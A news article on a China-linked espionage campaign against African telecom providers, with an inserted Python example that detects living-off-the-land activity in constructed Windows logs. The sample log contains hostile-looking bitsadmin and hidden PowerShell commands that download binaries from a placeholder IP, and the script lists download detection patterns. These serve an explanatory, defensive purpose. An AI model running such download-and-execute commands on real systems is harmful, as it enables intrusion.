Telecommunications service providers in Africa are being targeted by a new campaign orchestrated by threat actors linked to China since at least November 2022.
The intrusions have been attributed to a hacking crew tracked by Symantec as Daggerfly, which is also known to the wider cybersecurity community as Bronze Highland and Evasive Panda.
The campaign uses "a previously unseen plug-in from the MgBot malware framework," the cybersecurity firm said in a report shared with The Hacker News. "The attackers were also seen using the PlugX loader and abusing the legitimate AnyDesk remote desktop software."
According to Secureworks, the threat actors have used spear-phishing as the initial infection vector to drop MgBot as well as other tools such as Cobalt Strike and an Android remote access trojan (RAT) called KsRemote.
The group is suspected of carrying out espionage activities against domestic human rights and pro-democracy supporters and China’s neighbors since 2014.
Attack chains analyzed by Symantec show the use of living-off-the-land (LotL) tools like BITSAdmin and PowerShell to deliver next-stage payloads, including a legitimate AnyDesk executable and a credential-harvesting utility.
The threat actor then establishes persistence on the victim's system by creating a local account and deploying the MgBot modular framework, which comes with various plug-ins for capturing browser data, logging keystrokes, capturing screenshots, recording audio, and enumerating Active Directory services.
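The delivery and persistence steps above map onto events a defender already collects. The following is an added example, not code from the article or from Symantec: it runs simple detection rules over constructed log lines (a simplified key=value rendering of Windows Security events 4688 for process creation and 4720 for account creation; host names, users, paths and the TEST-NET IP are invented) and escalates any host where a BITSAdmin or PowerShell download is followed by a new local account within a short window. The rule names, the log format and the 30-minute window are assumptions for this example.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List, Tuple

# Constructed sample events (not real telemetry). Values containing spaces are quoted.
SAMPLE_LOG = r"""
2022-11-14T09:12:03Z host=WS-01 event=4688 user=alice image=C:\Windows\System32\bitsadmin.exe cmdline="bitsadmin /transfer upd /download /priority high http://198.51.100.23/a.bin C:\Users\Public\a.exe"
2022-11-14T09:12:41Z host=WS-01 event=4688 user=alice image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe cmdline="powershell -nop -w hidden -c (New-Object Net.WebClient).DownloadFile('http://198.51.100.23/b.bin','C:\Users\Public\b.exe')"
2022-11-14T09:15:10Z host=WS-01 event=4688 user=alice image=C:\Users\Public\AnyDesk.exe cmdline="C:\Users\Public\AnyDesk.exe --install C:\Users\Public --silent"
2022-11-14T09:16:55Z host=WS-01 event=4720 user=alice target=svc_backup
2022-11-14T10:02:00Z host=WS-02 event=4688 user=bob image="C:\Program Files\AnyDesk\AnyDesk.exe" cmdline="C:\Program Files\AnyDesk\AnyDesk.exe"
2022-11-14T10:05:30Z host=WS-02 event=4688 user=bob image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe cmdline="powershell Get-Process"
"""

# key=value pairs; a value is either a double-quoted string or a run of non-whitespace.
FIELD = re.compile(r'(\w+)=("(?:[^"]*)"|\S+)')
# PowerShell download primitives and encoded-command switch commonly seen in LotL delivery.
PS_DOWNLOAD = re.compile(r"downloadfile|downloadstring|invoke-webrequest|\biwr\b|start-bitstransfer|-enc", re.I)
BITS_TRANSFER = re.compile(r"/transfer|/download|/addfile", re.I)
TRUSTED_INSTALL_DIRS = ("c:\\program files\\", "c:\\program files (x86)\\")


def parse_line(line: str) -> Dict[str, str]:
    """Split 'timestamp key=value ...' into a dict; quotes around values are dropped."""
    ts, _, rest = line.strip().partition(" ")
    event = {"ts": ts}
    for key, val in FIELD.findall(rest):
        event[key] = val.strip('"')
    return event


def classify(event: Dict[str, str]) -> List[str]:
    """Return the names of every detection rule the event matches (possibly none)."""
    hits: List[str] = []
    if event.get("event") == "4720":
        hits.append("local_account_created")
    if event.get("event") == "4688":
        image = event.get("image", "").lower()
        cmd = event.get("cmdline", "")
        name = image.rsplit("\\", 1)[-1]
        if name == "bitsadmin.exe" and BITS_TRANSFER.search(cmd):
            hits.append("bitsadmin_download")
        if name == "powershell.exe" and PS_DOWNLOAD.search(cmd):
            hits.append("powershell_download")
        # A remote-desktop binary running outside its normal install location.
        if name == "anydesk.exe" and not image.startswith(TRUSTED_INSTALL_DIRS):
            hits.append("anydesk_unusual_path")
    return hits


def detect(log_text: str) -> Dict[str, List[Tuple[str, str]]]:
    """Run every rule over every line and group (timestamp, rule) hits by host."""
    per_host: Dict[str, List[Tuple[str, str]]] = defaultdict(list)
    for line in log_text.strip().splitlines():
        event = parse_line(line)
        for rule in classify(event):
            per_host[event["host"]].append((event["ts"], rule))
    return dict(per_host)


def _ts(value: str) -> datetime:
    return datetime.strptime(value, "%Y-%m-%dT%H:%M:%SZ")


def escalate(findings: Dict[str, List[Tuple[str, str]]], window_minutes: int = 30) -> List[str]:
    """Hosts where a LotL download was followed by local account creation within the window."""
    window = timedelta(minutes=window_minutes)
    flagged = []
    for host, hits in findings.items():
        downloads = [_ts(t) for t, rule in hits if rule.endswith("_download")]
        accounts = [_ts(t) for t, rule in hits if rule == "local_account_created"]
        if any(timedelta(0) <= (a - d) <= window for d in downloads for a in accounts):
            flagged.append(host)
    return sorted(flagged)


if __name__ == "__main__":
    findings = detect(SAMPLE_LOG)
    for host, hits in findings.items():
        for ts, rule in hits:
            print(f"{host} {ts} {rule}")
    print("escalate:", escalate(findings))
```

Each individual rule is noisy on its own (administrators do create accounts and run BITS jobs), which is why the example only escalates on the sequence the article describes: a download via a LotL tool, then a new local account on the same host shortly afterwards.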
"All of these capabilities allow an attacker to collect large amounts of information from the victim's machine," said Symantec. "The capabilities of this plug-in also demonstrate that the main goal of attackers during this campaign is to gather information."
The breadth of MgBot's capabilities suggests that its operators actively maintain and update it in order to gain access to victims' environments.
The disclosure comes barely a month after SentinelOne detailed a Q1 2023 campaign called Tainted Love that targeted telecom providers in the Middle East and was attributed to a Chinese cyberespionage group overlapping with Gallium (aka Othorene).
Symantec further said it identified three additional victims of the same activity group, located in Asia and Africa. Two of the victims, compromised in November 2022, are subsidiaries of a telecommunications company in the Middle East.
"Telecommunication companies will always be prime targets in intelligence gathering campaigns because of the access they can provide to end-user communications," said Symantec.